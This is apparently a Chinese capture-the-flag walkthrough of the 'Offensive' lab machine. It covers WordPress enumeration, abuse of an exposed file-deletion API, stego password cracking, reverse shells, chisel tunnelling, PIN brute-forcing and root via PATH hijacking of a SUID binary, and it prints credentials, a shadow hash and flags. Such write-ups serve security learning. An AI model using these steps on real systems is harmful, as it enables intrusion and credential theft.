信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.170  08:00:27:87:39:6d       (Unknown)
192.168.60.254  00:50:56:e0:65:b2       (Unknown)

14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.957 seconds (130.81 hosts/sec). 4 responded
❯ export ip=192.168.60.170
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.170:22
Open 192.168.60.170:80
Open 192.168.60.170:8080
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-01 20:55 CST
Initiating ARP Ping Scan at 20:55
Scanning 192.168.60.170 [1 port]
Completed ARP Ping Scan at 20:55, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:55
Completed Parallel DNS resolution of 1 host. at 20:55, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:55
Scanning 192.168.60.170 [3 ports]
Discovered open port 80/tcp on 192.168.60.170
Discovered open port 8080/tcp on 192.168.60.170
Discovered open port 22/tcp on 192.168.60.170
Completed SYN Stealth Scan at 20:55, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.170
Host is up, received arp-response (0.00059s latency).
Scanned at 2025-02-01 20:55:42 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
8080/tcp open  http-proxy syn-ack ttl 64
MAC Address: 08:00:27:87:39:6D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

编辑hosts，添加域名

1
2
3

❯ sudo vim /etc/hosts
[sudo] password for Pepster:
192.168.60.170  offensive.thl

川普🤣

扫了一下目录发现是基于wordpress

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.170
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.60.170/images/]
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.60.170/wp-content/]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.60.170/wp-includes/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.60.170/javascript/]
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.60.170/wp-admin/]
/makehomepage         (Status: 301) [Size: 323] [--> http://192.168.60.170/makehomepage/]
/server-status        (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

wpscan插件枚举

那直接上wpscan扫一下，同时主动扫描全部插件

枚举到一个用户名administrator还有有个wps-hide-login的插件

这些插件也没有漏洞

❯ wpscan --url http://$ip -e u,ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.60.170/ [192.168.60.170]
[+] Started: Sat Feb  1 21:05:14 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.62 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.60.170/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.60.170/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.60.170/, Match: 'WordPress 6.7.1'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:58 <================================================================> (108890 / 108890) 100.00% Time: 00:00:58
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.60.170/wp-content/plugins/akismet/
 | Latest Version: 5.3.5
 | Last Updated: 2024-11-19T02:02:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.60.170/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] wps-hide-login
 | Location: http://192.168.60.170/wp-content/plugins/wps-hide-login/
 | Latest Version: 1.9.17.1 (up to date)
 | Last Updated: 2024-10-09T09:23:00.000Z
 | Readme: http://192.168.60.170/wp-content/plugins/wps-hide-login/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.60.170/wp-content/plugins/wps-hide-login/, status: 200
 |
 | Version: 1.9.17.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.60.170/wp-content/plugins/wps-hide-login/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.60.170/wp-content/plugins/wps-hide-login/readme.txt

[+] wpterm
 | Location: http://192.168.60.170/wp-content/plugins/wpterm/
 | Latest Version: 1.1.9 (up to date)
 | Last Updated: 2024-11-03T14:29:00.000Z
 | Readme: http://192.168.60.170/wp-content/plugins/wpterm/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.60.170/wp-content/plugins/wpterm/, status: 200
 |
 | Version: 1.1.9 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.60.170/wp-content/plugins/wpterm/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.60.170/wp-content/plugins/wpterm/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] administrator
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Feb  1 21:06:19 2025
[+] Requests Done: 108914
[+] Cached Requests: 46
[+] Data Sent: 24.258 MB
[+] Data Received: 14.584 MB
[+] Memory used: 424.504 MB
[+] Elapsed time: 00:01:05

这个插件主要就是隐藏管理员登入地址的入口

除此之外没有任何有用的信息

突破口

所以换个方向，8080端口还没访问

curl一下，返回一个Cannot GET /

❯ curl http://192.168.60.170:8080/
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /</pre>
</body>
</html>

扫一下目录

❯ gobuster dir -u http://$ip:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.170:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/help                 (Status: 200) [Size: 203]
/cat                  (Status: 500) [Size: 31]
/ls                   (Status: 200) [Size: 176]
/rm                   (Status: 500) [Size: 45]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

发现有个help，看一下帮助手册

我使用ls可以看到当前目录的所有文件

还可以下载删除之类的

❯ curl http://192.168.60.170:8080/help
{"GET /ls":"ls?path= : List files.","GET /download/:filename":"Download file.","GET /cat":"cat?path= : Show file.","GET /rm":"rm?path= : Delete file.","GET /help":"Help.","Restrictions":"Only /var/www."}%
❯ curl http://192.168.60.170:8080/ls\?path\=wordpress
[{"name":"images","isDirectory":true,"size":4096,"modified":"2024-12-24T20:26:33.467Z"},{"name":"index.php","isDirectory":false,"size":405,"modified":"2020-02-06T06:33:11.000Z"},{"name":"makehomepage","isDirectory":true,"size":4096,"modified":"2024-12-22T23:16:37.578Z"},{"name":"wp-activate.php","isDirectory":false,"size":7387,"modified":"2024-02-13T14:19:09.000Z"},{"name":"wp-admin","isDirectory":true,"size":4096,"modified":"2024-11-21T15:00:03.000Z"},{"name":"wp-blog-header.php","isDirectory":false,"size":351,"modified":"2020-02-06T06:33:11.000Z"},{"name":"wp-comments-post.php","isDirectory":false,"size":2323,"modified":"2023-06-14T14:11:16.000Z"},{"name":"wp-config.php","isDirectory":false,"size":3320,"modified":"2024-12-20T12:01:45.475Z"},{"name":"wp-content","isDirectory":true,"size":4096,"modified":"2024-11-21T15:19:57.000Z"},{"name":"wp-cron.php","isDirectory":false,"size":5617,"modified":"2024-08-02T19:40:16.000Z"},{"name":"wp-includes","isDirectory":true,"size":12288,"modified":"2024-11-21T15:19:49.000Z"},{"name":"wp-links-opml.php","isDirectory":false,"size":2502,"modified":"2022-11-26T21:01:17.000Z"},{"name":"wp-load.php","isDirectory":false,"size":3937,"modified":"2024-03-11T10:05:15.000Z"},{"name":"wp-login.php","isDirectory":false,"size":51367,"modified":"2024-09-30T19:12:14.000Z"},{"name":"wp-mail.php","isDirectory":false,"size":8543,"modified":"2024-09-18T22:37:15.000Z"},{"name":"wp-settings.php","isDirectory":false,"size":29032,"modified":"2024-09-30T17:08:26.000Z"},{"name":"wp-signup.php","isDirectory":false,"size":34385,"modified":"2023-06-19T18:27:27.000Z"},{"name":"wp-trackback.php","isDirectory":false,"size":5102,"modified":"2024-10-18T15:56:18.000Z"}]%

既然装了隐藏admin-login的插件那把他删了不就恢复正常了

1
2

❯ curl http://192.168.60.170:8080/ls\?path\=wordpress/wp-content/plugins
……………省略…………{"name":"wps-hide-login","isDirectory":true,"size":4096,"modified":"2024-10-09T15:23:22.000Z"}………………

直接把这个文件夹删了

1 2	❯ curl http://192.168.60.170:8080/rm\?path\=wordpress/wp-content/plugins/wps-hide-login {"message":"File or directory deleted successfully."}%

现在访问wp-admin可以了

但我尝试了爆破密码，无果

图片隐写

想起来之前还扫到一个images的目录，里面有张图片

wget一下，大概率图片中藏有信息

利用steghide查看一下结果有密码

用stegseek爆破一下，得到密码凭证

❯ wget http://offensive.thl/images/wp-login.jpg
--2025-02-01 22:02:45--  http://offensive.thl/images/wp-login.jpg
Resolving offensive.thl (offensive.thl)... 192.168.60.170
Connecting to offensive.thl (offensive.thl)|192.168.60.170|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 648072 (633K) [image/jpeg]
Saving to: ‘wp-login.jpg’

wp-login.jpg                          100%[=======================================================================>] 632.88K  --.-KB/s    in 0.01s

2025-02-01 22:02:45 (54.1 MB/s) - ‘wp-login.jpg’ saved [648072/648072]
❯ steghide extract -sf wp-login.jpg
Enter passphrase:
❯ stegseek -wl /usr/share/wordlists/rockyou.txt wp-login.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "bestfriend"
[i] Original filename: "wp-login.txt".
[i] Extracting to "wp-login.jpg.out".
❯ cat wp-login.jpg.out
uFQ07kmjImx$)x9HHH3J3Sa5

登入上去拿shell可以上传恶意插件

具体可以参考TheHackersLabs-Debugsec-Walkthrough | Pepster’Blog

用户提权

监听一下端口

得到一个用户maria

❯ pwncat-cs -lp 4444
[22:24:52] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[22:25:07] received connection from 192.168.60.170:46744                                                                                    bind.py:84
[22:25:08] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
[22:25:24] 192.168.60.170:46744: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@TheHackersLabs-Offensive:/var/www/wordpress/wp-content$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
maria:x:1001:1001::/home/maria:/bin/bash

看一下wordpress的配置文件，里面有数据库的密码

尝试连接一下，好吧没有什么信息

(remote) www-data@TheHackersLabs-Offensive:/var/www/wordpress$ cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wp_user' );

/** Database password */
define( 'DB_PASSWORD', 'wpManoloPass' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 *
 * At the installation time, database tables are created with the specified prefix.
 * Changing this value after WordPress is installed will make your site think
 * it has not been installed.
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
(remote) www-data@TheHackersLabs-Offensive:/tmp$ ss -luntp
Netid       State        Recv-Q       Send-Q             Local Address:Port             Peer Address:Port       Process
udp         UNCONN       0            0                        0.0.0.0:68                    0.0.0.0:*
tcp         LISTEN       0            80                     127.0.0.1:3306                  0.0.0.0:*
tcp         LISTEN       0            4096                     0.0.0.0:5000                  0.0.0.0:*
tcp         LISTEN       0            511                      0.0.0.0:8080                  0.0.0.0:*           users:(("node",pid=601,fd=18))
tcp         LISTEN       0            128                      0.0.0.0:22                    0.0.0.0:*
tcp         LISTEN       0            511                            *:80                          *:*
tcp         LISTEN       0            128                         [::]:22                       [::]:*

chisel端口转发

但我们发现5000端口开放，但我们扫不到，利用Chisel进行端口转发

(remote) www-data@TheHackersLabs-Offensive:/$ cd /tmp/
(remote) www-data@TheHackersLabs-Offensive:/tmp$ ls
(remote) www-data@TheHackersLabs-Offensive:/tmp$ wget 192.168.60.100/chisel
--2025-02-01 08:42:49--  http://192.168.60.100/chisel
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9371800 (8.9M) [application/octet-stream]
Saving to: 'chisel'

chisel                                100%[=======================================================================>]   8.94M  51.5MB/s    in 0.2s

2025-02-01 08:42:49 (51.5 MB/s) - 'chisel' saved [9371800/9371800]

(remote) www-data@TheHackersLabs-Offensive:/tmp$ chmod +x chisel
(remote) www-data@TheHackersLabs-Offensive:/tmp$ ./chisel client 192.168.60.100:1234 R:5000:127.0.0.1:5000
2025/02/01 08:45:29 client: Connecting to ws://192.168.60.100:1234
2025/02/01 08:45:29 client: Connected (Latency 864.092µs)
------------分隔-----------------------
❯ ./chisel server --reverse -p 1234
2025/02/01 22:44:28 server: Reverse tunnelling enabled
2025/02/01 22:44:28 server: Fingerprint 7ay8QFKpcKJoy7bqG4yeHn4OUpW6WbSzjRpB4zK05EA=
2025/02/01 22:44:28 server: Listening on http://0.0.0.0:1234
2025/02/01 22:45:28 server: session#1: tun: proxy#R:5000=>5000: Listening

这时候你再访问5000端口，会发现刚进去就已经缓存了一个用户凭证

但是需要输入pin码，好在就四位

直接爆破得了，burpsuite启动

不知道为啥intruder模块爆的这么慢

wfuzz爆破

我用wfuzz好了

得到pin码为3333会302跳转

❯ seq 1000 9999 >pass
❯ wfuzz -c -u "http://127.0.0.1:5000/" -d "usuario=admin&password=disconnected&pin=FUZZ" -w pass --hw 283
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://127.0.0.1:5000/
Total requests: 9000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000002334:   302        0 L      0 W        0 Ch        "3333"

Total time: 26.28226
Processed Requests: 9000
Filtered Requests: 8999
Requests/sec.: 342.4362

进去好像是可以执行命令之类的

nc弹shell过来，监听端口

❯ pwncat-cs -lp 4444
[23:02:48] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[23:02:49] received connection from 192.168.60.170:35768                                                                                    bind.py:84
[23:02:49] 0.0.0.0:4444: normalizing shell path                                                                                         manager.py:957
[23:03:05] 192.168.60.170:35768: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) maria@TheHackersLabs-Offensive:/home/maria$ cat user.txt
dfashsd6bh7afd859bd6fab5dsb0
(remote) maria@TheHackersLabs-Offensive:/home/maria$ ls
app  backup.txt  GyMG.jpg  index.php  logout.php  user.txt  welcome.php

Root提权

家目录有个app的可执行程序拥有suid权限

运行一下，发现是显示shadow前8行的，但为啥执行两遍呢

(remote) maria@TheHackersLabs-Offensive:/home/maria$ ./app


[*] Mostrando las primeras 8 líneas del archivo /etc/shadow

root:$y$j9T$2mXNTjVfEEjRt6t2uVu7k0$RBnftcaGot4JsJ8DHVuo0LkG8UuuKR68CdazrjK2Rf8:20088:0:99999:7:::
daemon:*:20066:0:99999:7:::
bin:*:20066:0:99999:7:::
sys:*:20066:0:99999:7:::
sync:*:20066:0:99999:7:::
games:*:20066:0:99999:7:::
man:*:20066:0:99999:7:::
lp:*:20066:0:99999:7:::


[*] Mostrando las primeras 8 líneas del archivo /etc/shadow

root:$y$j9T$2mXNTjVfEEjRt6t2uVu7k0$RBnftcaGot4JsJ8DHVuo0LkG8UuuKR68CdazrjK2Rf8:20088:0:99999:7:::
daemon:*:20066:0:99999:7:::
bin:*:20066:0:99999:7:::
sys:*:20066:0:99999:7:::
sync:*:20066:0:99999:7:::
games:*:20066:0:99999:7:::
man:*:20066:0:99999:7:::
lp:*:20066:0:99999:7:::

看一下程序调用了什么指令

(remote) maria@TheHackersLabs-Offensive:/home/maria$ strings app |grep head
/usr/bin/head -n 8 /etc/shadow
head -n 8 /etc/shadow
z

利用head读取了shadow

如何利用这个提权嘞，命令劫持大概率是不行的，因为程序中指定的是绝对路径

我尝试了alias命名别名，无果

哎不对啊，第二个的head命令没有指定路径

环境变量劫持

可以环境变量劫持

尝试一下

(remote) maria@TheHackersLabs-Offensive:/home/maria$ echo "bash -p">head
(remote) maria@TheHackersLabs-Offensive:/home/maria$ chmod +x head
(remote) maria@TheHackersLabs-Offensive:/home/maria$ export PATH=/home/maria:$PATH
(remote) maria@TheHackersLabs-Offensive:/home/maria$ echo $PATH
/home/maria:/usr/bin:/usr/sbin:/bin:/sbin:/usr/local/bin:/usr/local/sbin
(remote) maria@TheHackersLabs-Offensive:/home/maria$ ./app


[*] Mostrando las primeras 8 líneas del archivo /etc/shadow

root:$y$j9T$2mXNTjVfEEjRt6t2uVu7k0$RBnftcaGot4JsJ8DHVuo0LkG8UuuKR68CdazrjK2Rf8:20088:0:99999:7:::
daemon:*:20066:0:99999:7:::
bin:*:20066:0:99999:7:::
sys:*:20066:0:99999:7:::
sync:*:20066:0:99999:7:::
games:*:20066:0:99999:7:::
man:*:20066:0:99999:7:::
lp:*:20066:0:99999:7:::


[*] Mostrando las primeras 8 líneas del archivo /etc/shadow

root@TheHackersLabs-Offensive:~# id
uid=0(root) gid=1001(maria) grupos=1001(maria)
root@TheHackersLabs-Offensive:~# cat /root/root.txt
asfsdg54asf978bsadb54d9afb785db48